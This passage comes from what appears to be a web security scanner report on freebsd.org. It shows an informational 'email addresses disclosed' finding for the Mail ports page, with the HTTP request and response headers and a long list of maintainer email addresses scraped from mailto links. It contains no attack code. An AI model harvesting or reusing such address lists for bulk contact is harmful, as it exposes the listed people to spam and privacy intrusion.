<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nmh@t3x.org">nmh@t3x.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mitsururike@gmail.com">mitsururike@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:erik@bz.bzflag.bz">erik@bz.bzflag.bz</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tijl@coosemans.org">tijl@coosemans.org</A>
...[SNIP]...
<A HREF="mailto:tijl@coosemans.org">tijl@coosemans.org</A>
...[SNIP]...
<A HREF="mailto:numisemis@yahoo.com">numisemis@yahoo.com</A>
...[SNIP]...
<A HREF="mailto:numisemis@yahoo.com">numisemis@yahoo.com</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nmh@t3x.org">nmh@t3x.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:berend@pobox.com">berend@pobox.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joemann@beefree.free.de">joemann@beefree.free.de</A>
...[SNIP]...
<A HREF="mailto:joemann@beefree.free.de">joemann@beefree.free.de</A>
...[SNIP]...
<A HREF="mailto:wes@FreeBSD.org">wes@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:citric@cubicone.tmetic.com">citric@cubicone.tmetic.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mutoh@openedu.org">mutoh@openedu.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:java@FreeBSD.org">java@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...

24.314. http://www.freebsd.org/ports/mail.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/mail.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ports/mail.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "610696267"
Last-Modified: Sun, 23 Jan 2011 02:29:32 GMT
Content-Length: 1439956
Connection: close
Date: Mon, 24 Jan 2011 16:16:34 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Mail</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/ht
...[SNIP]...
<A HREF="mailto:scott+ports@sabami.seaslug.org">scott+ports@sabami.seaslug.org</A>
...[SNIP]...
<A HREF="mailto:fernan@iib.unsam.edu.ar">fernan@iib.unsam.edu.ar</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nohtml@tundraware.com">nohtml@tundraware.com</A>
...[SNIP]...
<A HREF="mailto:lioux@FreeBSD.org">lioux@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:glarkin@FreeBSD.org">glarkin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pankov_p@mail.ru">pankov_p@mail.ru</A>
...[SNIP]...
<A HREF="mailto:sergei@FreeBSD.org">sergei@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:umq@ueo.co.jp">umq@ueo.co.jp</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ricardo.katz@gmail.com">ricardo.katz@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kiwi@oav.net">kiwi@oav.net</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avk@vl.ru">avk@vl.ru</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mopsfelder@gmail.com">mopsfelder@gmail.com</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kay.abendroth@raxion.net">kay.abendroth@raxion.net</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bill.brinzer@gmail.com">bill.brinzer@gmail.com</A>
...[SNIP]...
<A HREF="mailto:bill.brinzer@gmail.com">bill.brinzer@gmail.com</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ismail.yenigul@endersys.com.tr">ismail.yenigul@endersys.com.tr</A>
...[SNIP]...
<A HREF="mailto:mashtizadeh@gmail.com">mashtizadeh@gmail.com</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:Olivier.Girard@univ-angers.fr">Olivier.Girard@univ-angers.fr</A>
...[SNIP]...
<A HREF="mailto:Olivier.Girard@univ-angers.fr">Olivier.Girard@univ-angers.fr</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:freebsd-ports@t-b-o-h.net">freebsd-ports@t-b-o-h.net</A>
...[SNIP]...
<A HREF="mailto:freebsd-ports@t-b-o-h.net">freebsd-ports@t-b-o-h.net</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:bra@fsn.hu">bra@fsn.hu</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:yanagisawa@csg.is.titech.ac.jp">yanagisawa@csg.is.titech.ac.jp</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd@netfence.it">freebsd@netfence.it</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jadawin@FreeBSD.org">jadawin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:demon@FreeBSD.org">demon@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tjs@cdpa.nsysu.edu.tw">tjs@cdpa.nsysu.edu.tw</A>
...[SNIP]...
<A HREF="mailto:demon@FreeBSD.org">demon@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gmc@sonologic.nl">gmc@sonologic.nl</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:gslin@gslin.org">gslin@gslin.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:scheidell@secnap.net">scheidell@secnap.net</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:vivek@khera.org">vivek@khera.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:greenwood.andy@gmail.com">greenwood.andy@gmail.com</A>
...[SNIP]...
<A HREF="mailto:tjs@cdpa.nsysu.edu.tw">tjs@cdpa.nsysu.edu.tw</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johnpupu@gmail.com">johnpupu@gmail.com</A>
...[SNIP]...
<A HREF="mailto:james@now.ie">james@now.ie</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gslin@gslin.org">gslin@gslin.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fbsd@opal.com">fbsd@opal.com</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:marc@pilgerer.org">marc@pilgerer.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:snowfly@yuntech.edu.tw">snowfly@yuntech.edu.tw</A>
...[SNIP]...
<A HREF="mailto:skreuzer@FreeBSD.org">skreuzer@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:james@now.ie">james@now.ie</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joehorn@gmail.com">joehorn@gmail.com</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joehorn@gmail.com">joehorn@gmail.com</A>
...[SNIP]...
<A HREF="mailto:bra@fsn.hu">bra@fsn.hu</A>
...[SNIP]...
<A HREF="mailto:rafan@FreeBSD.org">rafan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:buganini@gmail.com">buganini@gmail.com</A>
...[SNIP]...
<A HREF="mailto:thomas@bsdunix.ch">thomas@bsdunix.ch</A>
...[SNIP]...
<A HREF="mailto:A.J.Caines@halplant.com">A.J.Caines@halplant.com</A>
...[SNIP]...
<A HREF="mailto:flo@smeets.im">flo@smeets.im</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:nick@foobar.org">nick@foobar.org</A>
...[SNIP]...
<A HREF="mailto:joehorn@gmail.com">joehorn@gmail.com</A>
...[SNIP]...
<A HREF="mailto:joehorn@gmail.com">joehorn@gmail.com</A>
...[SNIP]...
<A HREF="mailto:dougb@FreeBSD.org">dougb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:jadawin@FreeBSD.org">jadawin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jonny@jonny.eng.br">jonny@jonny.eng.br</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mbr@FreeBSD.org">mbr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:leeym@FreeBSD.org">leeym@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ian@freislich.nom.za">ian@freislich.nom.za</A>
...[SNIP]...
<A HREF="mailto:matusita@FreeBSD.org">matusita@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tedm@ipinc.net">tedm@ipinc.net</A>
...[SNIP]...
<A HREF="mailto:andrew@ugh.net.au">andrew@ugh.net.au</A>
...[SNIP]...
<A HREF="mailto:kevlo@FreeBSD.org">kevlo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:A.J.Caines@halplant.com">A.J.Caines@halplant.com</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:delphij@FreeBSD.org">delphij@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kiwi@oav.net">kiwi@oav.net</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports.maintainer@evilphi.com">ports.maintainer@evilphi.com</A>
...[SNIP]...
<A HREF="mailto:robtone@ek-muc.de">robtone@ek-muc.de</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tabmow@freenode.net">tabmow@freenode.net</A>
...[SNIP]...
<A HREF="mailto:ports.maintainer@evilphi.com">ports.maintainer@evilphi.com</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:bapt@FreeBSD.org">bapt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:terry@sucked-in.com">terry@sucked-in.com</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:saturnero@gufi.org">saturnero@gufi.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:dimma@higis.ru">dimma@higis.ru</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:georg@graf.priv.at">georg@graf.priv.at</A>
...[SNIP]...
<A HREF="mailto:me@mortis.eu">me@mortis.eu</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dsh@wizard.volgograd.ru">dsh@wizard.volgograd.ru</A>
...[SNIP]...
<A HREF="mailto:chalpin@cs.wisc.edu">chalpin@cs.wisc.edu</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:utisoft@gmail.com">utisoft@gmail.com</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jmelo@FreeBSD.org">jmelo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:eksffa@freebsdbrasil.com.br">eksffa@freebsdbrasil.com.br</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lippe@FreeBSD.org">lippe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lippe@FreeBSD.org">lippe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:futurebsd@infoseek.to">futurebsd@infoseek.to</A>
...[SNIP]...
<A HREF="mailto:ismail.yenigul@endersys.com.tr">ismail.yenigul@endersys.com.tr</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mwill@spingen.com">mwill@spingen.com</A>
...[SNIP]...
